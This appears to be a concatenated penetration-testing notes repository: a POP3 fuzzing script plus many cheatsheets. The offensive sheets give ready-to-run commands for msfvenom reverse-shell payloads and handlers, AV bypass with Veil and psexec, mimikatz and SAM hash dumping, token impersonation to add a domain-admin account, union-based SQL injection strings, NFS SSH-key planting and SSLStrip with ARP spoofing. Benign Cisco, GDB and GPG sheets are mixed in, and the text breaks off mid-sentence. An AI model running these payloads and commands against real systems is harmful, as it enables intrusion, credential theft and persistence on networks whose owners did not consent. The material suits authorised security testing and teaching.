-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | #create an array of buffers, while incrementing them 5 | 6 | buffer=["A"] 7 | counter=100 8 | while len(buffer) <=30: 9 | buffer.append("A"*counter) 10 | counter=counter+200 11 | 12 | for string in buffer: 13 | print "Fuzzing PASS with %s bytes" % len(string) 14 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect=s.connect(('10.11.13.62',110)) 16 | s.recv(1024) 17 | s.send('USER test\r\n') 18 | s.recv(1024) 19 | s.send('PASS ' + string + '\r\n') 20 | s.send('QUIT\r\n') 21 | s.close() 22 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_AIXBuild.txt: -------------------------------------------------------------------------------- 1 | loslevel: 2 | -------- 3 | 4 | Reports back on installed service pack, maintenance etc. levels of the AIX deployment. 5 | Most of these appear to return absolutely nothing or loads of information. 6 | 7 | oslevel (reports back the overall AIX version e.g. 6.1.0.0) 8 | oslevel -q (reports back known maintenance levels on the host) 9 | oslevel -rq (reports back known Recommended Maintenance Levels, think major releases) 10 | oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack) 11 | 12 | e.g. 13 | oslevel -s -g 6100-08-03-1339 14 | 15 | lslpp: 16 | ------ 17 | 18 | Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself 19 | 20 | e.g. 21 | lslpp -l (lists all packages, most recent level and state of them) 22 | The package names can be passed back to it for more info, showing their patch management/application cycle. 23 | 24 | e.g. 25 | lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte 26 | 27 | rpm: 28 | ---- 29 | 30 | Standard redhat package manager, has turned up on a few machines. 31 | 32 | rpm -qa 33 | rpm -qa --last 34 | These will report back packages installed by rpm and when. 35 | 36 | Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag: 37 | e.g. find /home/ -perm 777 38 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_AVBypass.txt: -------------------------------------------------------------------------------- 1 | 1. Generate executable using Veil. 2 | 3 | 2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) 4 | 5 | msf > use exploit/windows/smb/psexec 6 | msf exploit(psexec) > set RHOST 192.168.0.2 7 | RHOST => 192.168.0.2 8 | msf exploit(psexec) > set SMBUser user 9 | SMBUser => user 10 | msf exploit(psexec) > set SMBPass pass 11 | SMBPass => pass 12 | msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe 13 | EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe 14 | msf exploit(psexec) > exploit -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_ApacheSSL.txt: -------------------------------------------------------------------------------- 1 | # Enabling Self signed certificates on local website 2 | 3 | 1. Install OpenSSL 4 | 5 | sudo apt-get install openssl 6 | 7 | 2. Run the following command to generate the self signed SSL certificates: 8 | 9 | sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key 10 | 11 | 3. Enable SSL for Apache 12 | 13 | sudo a2enmod ssl 14 | 15 | 4. Put the default-ssl site available creating a symbolic link 16 | 17 | sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 18 | 19 | 5. Edit the file default-ssl.conf 20 | 21 | sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf 22 | 23 | Change the following lines to point to the certs: 24 | 25 | SSLCertificateFile /etc/ssl/certs/server.crt 26 | SSLCertificateKeyFile /etc/ssl/private/server.key 27 | 28 | 6. Restart Apache 29 | 30 | sudo /etc/init.d/apache2 restart 31 | 32 | More information: 33 | https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/ 34 | https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html 35 | http://www.akadia.com/services/ssh_test_certificate.html 36 | https://www.sslshopper.com/apache-server-ssl-installation-instructions.html 37 | http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_AttackingMSSQL.txt: -------------------------------------------------------------------------------- 1 | [+] Attacking MSSQL with Metasploit 2 | 3 | [>] Enumerate MSSQL Servers on the network: 4 | 5 | msf > use auxiliary/scanner/mssql/mssql_ping 6 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 7 | Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. 8 | 9 | [>] Bruteforce MSSQL Database: 10 | 11 | msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login 12 | 13 | [>] Enumerate MSSQL Database: 14 | 15 | msf > use auxiliary/admin/mssql/mssql_enum 16 | 17 | [>] Gain shell using gathered credentials 18 | 19 | msf > use exploit/windows/mssql/mssql_payload 20 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 21 | 22 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_CTF.txt: -------------------------------------------------------------------------------- 1 | CTF Notes 2 | --------- 3 | 4 | # Enumerate Users via Finger 5 | finger user@192.168.0.20 6 | 7 | # Show nfs shares available 8 | showmount -e 192.168.1.54 9 | 10 | # User nfspysh to mount share and create .ssh directory 11 | nfspysh -o server=192.168.0.20:/home/user 12 | mkdir .ssh 13 | cd .ssh 14 | 15 | # Generate ssh key pair 16 | ssh-keygen 17 | cp id_rsa.pub /tmp/authorized_keys 18 | 19 | # Transfer attacker public key to host 20 | put /tmp/authorized_keys 21 | exit 22 | 23 | # Login to SSH server with no password 24 | SSH_AUTH_SOCK=0 ssh user@192.168.0.20 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_CiscoIOS.txt: -------------------------------------------------------------------------------- 1 | Cisco IOS Command Line Cheatsheet 2 | --------------------------------- 3 | 4 | --- Verify Basic Configuration: 5 | 6 | Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc. 7 | SW1# show version 8 | 9 | Shows the current configuration file stored in DRAM. 10 | SW1# show running-config 11 | 12 | Shows the configuration file stored in NVRAM which is used at first boot process. 13 | SW1# show startup-config 14 | 15 | Lists the commands currently held in the history buffer. 16 | SW1# show history 17 | 18 | Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned. 19 | SW1# show ip interface brief 20 | 21 | Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic. 22 | SW1# show interface vlan 1 23 | 24 | Shows the description of all interfaces 25 | SW1# show interfaces description 26 | 27 | Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan. 28 | SW1# show interfaces status 29 | 30 | Shows the public encryption key used for SSH. 31 | SW1# show crypto key mypubkey rsa 32 | 33 | Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server) 34 | SW1# show dhcp lease 35 | 36 | --- Router Modes: 37 | 38 | Router>: User mode = Limited to basic monitoring commands 39 | Router#: Privileged mode (exec-level mode) = Provides access to all other router commands 40 | Router(config)#: global configuration mode = Commands that affect the entire system 41 | Router(config-if)#: interface mode = Commands that affect interfaces 42 | Router(config-subif)#: subinterface mode = Commands that affect subinterfaces 43 | Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…) 44 | Router(config-router)#: router configuration mode 45 | 46 | --- Changing switch hostname: 47 | 48 | Switch(config)# hostname SW1 49 | 50 | --- Configuring passwords: 51 | 52 | SW1(config)# enable secret cisco ! MD5 hash 53 | SW1(config)# enable password notcisco ! Clear text 54 | 55 | --- Securing console port: 56 | 57 | SW1(config)# line con 0 58 | SW1(config-line)# password cisco 59 | SW1(config-line)# login 60 | 61 | --- Securing terminal lines: 62 | 63 | SW1(config)# line vty 0 4 64 | SW1(config-line)# password cisco 65 | SW1(config-line)# login 66 | 67 | --- Encrypting passwords: 68 | 69 | SW1(config)# service password-encryption 70 | 71 | --- Configuring banners: 72 | 73 | SW1(config)# banner motd $ 74 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 75 | UNAUTHORIZED ACCESS IS PROHIBITED 76 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 77 | $ 78 | 79 | --- Giving the switch an IP address: 80 | 81 | SW1(config)# interface vlan 1 82 | SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP 83 | SW1(config-if)# no shutdown 84 | 85 | --- Setting the default gateway: 86 | 87 | SW1(config)# ip default-gateway 172.16.1.1 88 | 89 | --- Saving configuration: 90 | 91 | SW1# copy running-config startup-config 92 | Destination filename [startup-config]? ! Press enter to confirm file name. 93 | Building configuration… 94 | [OK] 95 | 96 | ! Short for write memory. 97 | SW1# wr 98 | Building configuration… 99 | [OK] -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_CookieStealing.txt: -------------------------------------------------------------------------------- 1 | [+] Cookie Stealing: 2 | 3 | [-] Start Web Service 4 | 5 | python -m SimpleHTTPServer 80 6 | 7 | [-] Use one of the following XSS payloads: 8 | 9 | 10 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_DomainAdminExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] After compromising a Windows machine: 2 | 3 | [>] List the domain administrators: 4 | From Shell - net group "Domain Admins" /domain 5 | 6 | [>] Dump the hashes (Metasploit) 7 | msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE 8 | 9 | [>] Find the admins (Metasploit) 10 | spool /tmp/enumdomainusers.txt 11 | msf > use auxiliary/scanner/smb/smb_enumusers_domain 12 | msf > set smbuser Administrator 13 | msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 14 | msf > set rhosts 10.10.10.0/24 15 | msf > set threads 8 16 | msf > run 17 | 18 | msf> spool off 19 | 20 | [>] Compromise Admin's box 21 | meterpreter > load incognito 22 | meterpreter > list_tokens -u 23 | meterpreter > impersonate_token MYDOM\\adaministrator 24 | meterpreter > getuid 25 | meterpreter > shell 26 | 27 | C:\> whoami 28 | mydom\adaministrator 29 | C:\> net user hacker /add /domain 30 | C:\> net group "Domain Admins" hacker /add /domain -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_ExploitDev.txt: -------------------------------------------------------------------------------- 1 | Exploit Development Cheatsheet 2 | ------------------------------ 3 | 4 | [+] Fuzzing: 5 | 6 | import socket 7 | 8 | buffer = ["A"] 9 | counter = 50 10 | 11 | while len(buffer) <= 1000: 12 | buffer.append("A" * counter) 13 | counter = counter + 50 14 | 15 | for buffstring in buffer: 16 | print "Fuzzing:" + str(len(buffstring)) 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.connect( ("192.168.0.20", 5555) ) 19 | sock.send(buffstring) 20 | sock.close() 21 | 22 | 23 | [+] Bad Character Testing: 24 | 25 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e" 26 | "\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d" 27 | "\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c" 28 | "\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" 29 | "\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" 30 | "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" 31 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68" 32 | "\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77" 33 | "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86" 34 | "\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95" 35 | "\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4" 36 | "\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3" 37 | "\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2" 38 | "\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1" 39 | "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 40 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" 41 | "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe" 42 | "\xff" 43 | 44 | 45 | [+] Structured Exception Handler (SEH) Exploitation notes 46 | 47 | - Crash the application 48 | - Check SEH overwirte (view-seh chain) 49 | - Find offset (!mona pattern_create ) 50 | - Find certain SEH references to the cyclic pattern (!mona findmsp) 51 | - Verify offset to NSEH (Next Exception) 52 | - Find POP/POP/RET address with mona (!mona seh -cpb ) 53 | - Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding) 54 | - Add shellcode to the payload 55 | - Ensure existing padding to make sure the crash still happens. -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_GDB.txt: -------------------------------------------------------------------------------- 1 | set disassembly-flavor intel 2 | 3 | $ cat ~/.bash_aliases | grep gdb 4 | alias gdb='gdb -quiet' 5 | 6 | Running gdb 7 | ------------------ 8 | $ gdb - run, then use file command to load object 9 | $ gdb -quiet - supress copyright information 10 | $ gdb object - normal debug 11 | $ gdb object core - analyze core dump 12 | $ gdb object pid - attach to running process 13 | 14 | General commands 15 | ------------------ 16 | set args - set program arguments 17 | show args - show program arguments 18 | run - run the program 19 | run < file - run with input from file 20 | set follow-exec-mode new/sam - set debugger response to an exec call 21 | set write - set write into executables 22 | set write off - unset write int oexecutables 23 | continue - continue running until break 24 | finish - execute until current stack frame ends 25 | source FILE - read commands from script file 26 | shell [cmd] - run cmd in a shell 27 | display /5i $eip - display expression everytime execution stops 28 | undisplay - undisplay expression number 29 | info functions - list all the functions 30 | info variables - list all the variables 31 | info registers - list most common registers 32 | info all-registers - list all registers 33 | info display - print the list of displayed expressions 34 | backtrace - print backtrace of all stack frames 35 | where - same as backtrace 36 | set disassembly-flavor intel - set disassembly style to intel/att 37 | define hook-[cmd] - actions to execute before command 38 | define hooopost-[cmd] - actions to execute after command 39 | define hook-stop - actions to execute when execution stops 40 | 41 | Breakpoints 42 | ------------------ 43 | info breakpoints - list all breakpoints 44 | break [func] - break function name 45 | break *[addr] - break at address 46 | delete [bnum] - delete breakpoint bnum 47 | break if [cond] - break if condition 48 | ignore [bnum] [count] - ignore breakpoint bnum count times 49 | condition [bnum] $eax == 0x22 - add condition for breakpoint 1 50 | condition [bnum] - delete condition for breakpoint 1 51 | 52 | Watchpoints 53 | ------------------ 54 | info watchpoints - list all the watchpoint 55 | watch variable==value - break when variable equals .. 56 | watch $eax == 0x0000ffaa - break when register equals .. 57 | rwatch *[addr] - break on read memory location 58 | awatch *[addr] - break on read/write memory location -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_GPG.txt: -------------------------------------------------------------------------------- 1 | Encrypt 2 | ------------ 3 | sudo gpg -e ~/Desktop/file.doc 4 | 5 | This will prompt you to type in the persons name (public key) to encrypt with. 6 | 7 | Decrypt 8 | ----------- 9 | sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc 10 | 11 | 12 | Import other users' public keys by using: 13 | 14 | sudo gpg --import -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_HTTPBasicAuth.txt: -------------------------------------------------------------------------------- 1 | [>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite 2 | 3 | http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ 4 | 5 | Burp Suite against HTTP Basic authentication 6 | 7 | To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. 8 | 9 | Mark only the Base64 encoded string and click Add button to put the markers around it. 10 | 11 | Dictionary attack 12 | 13 | For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. 14 | Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. 15 | Go to Payload tab and select Custom iterator option from Payload type dropdown box. 16 | Burp Suite Custom Iterator 17 | Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. 18 | Position 1 list and separator option 19 | Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. 20 | Position 2 21 | After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. 22 | PayloadProcessin_AddRule_Encode 23 | PayloadProcessingEncode 24 | By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. 25 | That’s it. You can start the Intruder attack. 26 | 27 | Bruteforce attack 28 | 29 | The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. 30 | Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. 31 | Burp Intruder Brute forcer 32 | In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. 33 | Burp Intruder Add Prefix 34 | Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. 35 | Burp Sutei Bruteforce Attack Settings 36 | Done! You can start the Intruder attack! 37 | 38 | [>] Automated Security Analyser for ASP.NET Websites 39 | 40 | https://asafaweb.com -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_LocalSamDump.txt: -------------------------------------------------------------------------------- 1 | fdisk -l 2 | 3 | mount -t ntfs /dev/sda1 /mnt 4 | 5 | df -k 6 | 7 | cd /mnt 8 | ls 9 | cd WINDOWS/system32/config 10 | 11 | ls 12 | bkhive system /root/hive.txt 13 | samdump2 SAM /root/hive.txt > /root/hash.txt 14 | 15 | john /root/hash.txt -format=nt2 -users=Administrator 16 | cd /root/.john 17 | ls -l 18 | cat john.pot -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_MSFPostExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] Meterpreter Shell 2 | 3 | meterpreter > sysinfo 4 | 5 | meterpreter > getuid 6 | 7 | meterpreter > getsystem 8 | 9 | meterpreter > hashdump 10 | 11 | meterpreter > load/use mimikatz 12 | 13 | kerberos Attempt to retrieve kerberos creds 14 | livessp Attempt to retrieve livessp creds 15 | mimikatz_command Run a custom commannd 16 | msv Attempt to retrieve msv creds (hashes) 17 | ssp Attempt to retrieve ssp creds 18 | tspkg Attempt to retrieve tspkg creds 19 | wdigest Attempt to retrieve wdigest creds 20 | 21 | meterpreter > wdigest 22 | 23 | meterpreter > use incognito 24 | meterpreter > list_tokens -u 25 | meterpreter > impersonate_token SERV-2K3\\Administrator 26 | execute -f cmd.exe -i -t -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Metasploit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/Cheatsheet_Metasploit.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_MetasploitPayloads.txt: -------------------------------------------------------------------------------- 1 | [+] Creating Metasploit Payloads 2 | 3 | List payloads 4 | msfvenom -l 5 | 6 | Binaries 7 | 8 | Linux 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 10 | 11 | Windows 12 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 13 | 14 | Mac 15 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 16 | 17 | 18 | Web Payloads 19 | 20 | PHP 21 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 22 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 23 | 24 | ASP 25 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 26 | 27 | JSP 28 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 29 | 30 | WAR 31 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 32 | 33 | 34 | Scripting Payloads 35 | 36 | Python 37 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 38 | 39 | Bash 40 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 41 | 42 | Perl 43 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 44 | 45 | 46 | Shellcode 47 | 48 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 49 | 50 | Linux Based Shellcode 51 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 52 | 53 | Windows Based Shellcode 54 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 55 | 56 | Mac Based Shellcode 57 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 58 | 59 | 60 | Handlers 61 | 62 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. 63 | 64 | use exploit/multi/handler 65 | set PAYLOAD 66 | set LHOST 67 | set LPORT 68 | set ExitOnSession false 69 | exploit -j -z 70 | 71 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ 72 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_MobileAppTesting.txt: -------------------------------------------------------------------------------- 1 | http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources 2 | 3 | ------------------------------------------ Mobile Application Test Notes (iPhone) 4 | 5 | 6 | Prepping Device and Application: 7 | 8 | [+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 9 | [+] Enable SSH on iPhone/iPad 10 | [+] Install iFunbox to install the application (http://www.i-funbox.com) 11 | [+] Connect device to lab wireless network 12 | [+] Add web proxy settings - IP address of attacking machine port 8080 13 | [+] Ensure connection and SSH is working 14 | 15 | 16 | Prepping Burp Suite: 17 | 18 | [+] Open Burp Suite and navigate to Proxy->Options, 19 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 20 | 21 | [+] Download and install burp certificate (.crt) onto ipad. 22 | 23 | Mobile Application Penetration Testing: 24 | 25 | [+] Browse the following Directory for insecure storage 26 | [-] /private/var/mobile/applications/ 27 | 28 | 29 | Notes: 30 | 31 | [+] Application file type - x.ipa 32 | 33 | [+] Easy way: 34 | 35 | - Place attacking machine and apple device on wireless network with app installed. 36 | - Email burps .cer to apple device and install 37 | - Start burp and disable firewall on listening machine. 38 | - Change proxy settings on apple device to point to listening burp machine/port. 39 | 40 | 41 | ------------------------------------------ Mobile Application Test Notes (Android) 42 | 43 | [+] Create a virtual device: 44 | [-] android avd 45 | 46 | [+] Start the emulator: 47 | [-] emulator –avd testavd 48 | 49 | [+] Install the application: 50 | [-] adb install 51 | 52 | [+] Open Burp Suite and navigate to Proxy->Options, 53 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 54 | 55 | [+] Start the emulator and proxy: 56 | [-] emulator –avd testavd –http-proxy http://localhost:8080 57 | 58 | [+] Download and install burp certificate (.crt) onto the emulator using the push shell command. 59 | 60 | 61 | Notes: 62 | 63 | [+] Application file type - x.apk 64 | 65 | Install Certs: http://www.realmb.com/droidCert/ 66 | SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp 67 | 68 | http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Networking.txt: -------------------------------------------------------------------------------- 1 | Useful Networking Cheatsheet 2 | ---------------------------- 3 | 4 | [+] Setting up an Ethernet bridge in Ubuntu/Kali Linux 5 | 6 | # Install bridge-utils 7 | sudo apt-get install bridge-utils 8 | 9 | # Disable network-manager + firewall 10 | 11 | # Configuration 12 | 13 | ifconfig 14 | ifconfig eth0 0.0.0.0 15 | ifconfig eth1 0.0.0.0 16 | brctl addbr br0 17 | brctl addif br0 eth0 18 | brctl addif br0 eth1 19 | ifconfig br0 up 20 | dhclient br0 21 | 22 | sudo tcpdump -i br0 -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Oracle.txt: -------------------------------------------------------------------------------- 1 | Oracle Penetration Testing 2 | -------------------------- 3 | 4 | Tools within Kali: 5 | 6 | oscanner 7 | root@kali:~# oscanner -s 192.168.1.15 -P 1040 8 | 9 | sidguess 10 | root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt 11 | 12 | tnscmd10g 13 | root@kali:~# tnscmd10g version -h 192.168.1.20 14 | 15 | Nmap 16 | nmap -p 1521 -A 192.168.15.205 17 | 18 | Nmap nse scripts 19 | Metasploit auxiliaries -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Pyinstaller.txt: -------------------------------------------------------------------------------- 1 | python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py 2 | 3 | [+] Generate the .spec file. 4 | [+] Windows: (You want a single EXE file with your data in it, hence --onefile). 5 | 6 | python pyinstaller.py --onefile your_main_file.py 7 | 8 | [+] Rebuild your package. 9 | 10 | python pyinstaller.py your_main_file.spec 11 | 12 | [+]Look for your .exe or your .app bundle in the dist directory. -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/Cheatsheet_Python.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Remediations.txt: -------------------------------------------------------------------------------- 1 | [+] Weak SSH Ciphers 2 | 3 | sudo nano /etc/ssh/sshd_config 4 | 5 | Add the following lines: 6 | 7 | Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour 8 | MACs hmac-sha1,hmac-ripemd160 9 | 10 | Restart SSH 11 | 12 | 13 | [+] Unquoted Service Paths 14 | 15 | Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services 16 | Find the service in question and simply add " " either side of the ImagePath string. 17 | 18 | Check permissions: 19 | C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe" -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SMBEnumeration.txt: -------------------------------------------------------------------------------- 1 | SMB Enumeration Techniques using Backtrack: 2 | 3 | 1. NBTSCAN 4 | 5 | root@bt:~# nbtscan -r 10.0.2.0/24 6 | Doing NBT name scan for addresses from 10.0.2.0/24 7 | 8 | IP address NetBIOS Name Server User MAC address 9 | ------------------------------------------------------------------------------ 10 | 10.0.2.0 Sendto failed: Permission denied 11 | 10.0.2.10 12 | 10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 13 | 10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d 14 | 10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 15 | 16 | 2. NMAP 17 | 18 | nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 19 | 20 | 3. SMBCLIENT 21 | 22 | root@bt:~# smbclient -L=10.0.2.15 23 | 24 | Null Sessions 25 | 26 | root@bt:~# smbclient \\\\10.0.2.15\\tmp 27 | Enter root's password: 28 | Anonymous login successful 29 | 30 | 31 | SMB Enumeration Techniques using Windows Tools: 32 | 33 | 1. NetBIOS Enumerator (nbtenum) 34 | 35 | http://nbtenum.sourceforge.net/ -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SMTPOpenRelay.txt: -------------------------------------------------------------------------------- 1 | [+] SMTP Open Relay Commands 2 | 3 | [-] ncat -C 86.54.23.178 25 4 | [-] HELO mail.co.uk 5 | [-] MAIL FROM: 6 | [-] RCPT TO: 7 | [-] DATA 8 | Test Email -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SQLInjection.txt: -------------------------------------------------------------------------------- 1 | [+] Union Based SQL Injection 2 | 3 | ' or 1=1# 4 | 5 | 1' ORDER BY 10# 6 | 7 | 1' UNION SELECT version(),2# 8 | 9 | 1' UNION SELECT version(),database()# 10 | 11 | 1' UNION SELECT version(),user()# 12 | 13 | 1' UNION ALL SELECT table_name,2 from information_schema.tables# 14 | 15 | 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 16 | 17 | 1' UNION ALL SELECT concat(user,char(58),password),2 from users# 18 | 19 | 20 | sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SSLStrip.txt: -------------------------------------------------------------------------------- 1 | 1) Flip your machine into forwarding mode (as root): 2 | echo "1" > /proc/sys/net/ipv4/ip_forward 3 | 4 | 2) Setup iptables to intercept HTTP requests (as root): 5 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 6 | 7 | 3) sslstip.py -l 8080 -f lock.ico 8 | 9 | 4) Run arpspoof to redirect 